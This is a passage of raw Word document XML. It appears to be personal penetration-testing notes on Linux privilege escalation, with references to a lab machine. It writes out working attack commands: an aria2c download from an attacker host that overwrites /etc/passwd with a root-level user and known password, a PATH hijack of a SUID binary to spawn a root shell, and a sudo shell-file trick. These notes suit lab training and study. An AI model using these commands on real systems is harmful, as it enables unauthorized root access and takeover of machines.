      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002268">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the contents to a file on your local machine called "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">newPasswd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002269">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have it on your local machine, Add user with root rights in the file (you can follow the guide in the "How to add root user if /etc/passwd is writable" section). Here, the password is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password@973</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tom:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ad7t5uIalqMws</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:0:0:User_like_root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the file locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload it inside /etc of target machine (must be in /etc directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/aria2c -o passwd "http://&lt;ip&gt;/newPasswd" --allow-overwrite=true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login as the user!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su Tom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002270">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password@973</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002271">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002272">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s4zm8970gqhu" w:id="303"/>
      <w:bookmarkEnd w:id="303"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002273">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002274">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId732">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw a very interesting attack vector. Using LinPeas, we saw that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/status</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> had it's SUID bit set, and we tried looking at this binary, but a lot of it was unreadable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002275">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002276">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="787400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="422" name="image404.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image404.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId733"/>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2277">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002278">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the "strings" command, and by looking at the original "cat" command, we find that the executable is calling the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but not using the absolute path. If we create our own </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file and update the PATH, we may be able to exploit this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002279">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "/bin/sh" &gt; service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x ./service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/tmp:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002280">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002281">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you should have root. We got lucky that the /usr/bin/status was running the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002282">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022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84">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xqphf8f4p8bk" w:id="304"/>
      <w:bookmarkEnd w:id="304"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SGID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002285">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002286">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same thing as SUID, but instead of being able to execute a file via the permissions of the owner, you get to execute the file via the permissions of the group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002287">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002288">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm /2000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002289">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic SGID Search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -g=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict to Regular Files Only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022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290">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sm6db4o8ccn2" w:id="305"/>
      <w:bookmarkEnd w:id="305"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002291">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002292">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a binary that allows you to run a file as root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then put the contents "/bin/bash" in a file (the file can have any name and file extension), and then run the file sudo, and you will get root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002293">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002294">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/sh' &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002295">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002296">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="830"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 allows all permissions for all users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002297">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then run the binary using sudo and this file as the target, like </w:t>
      </w:r>
    </w:p>
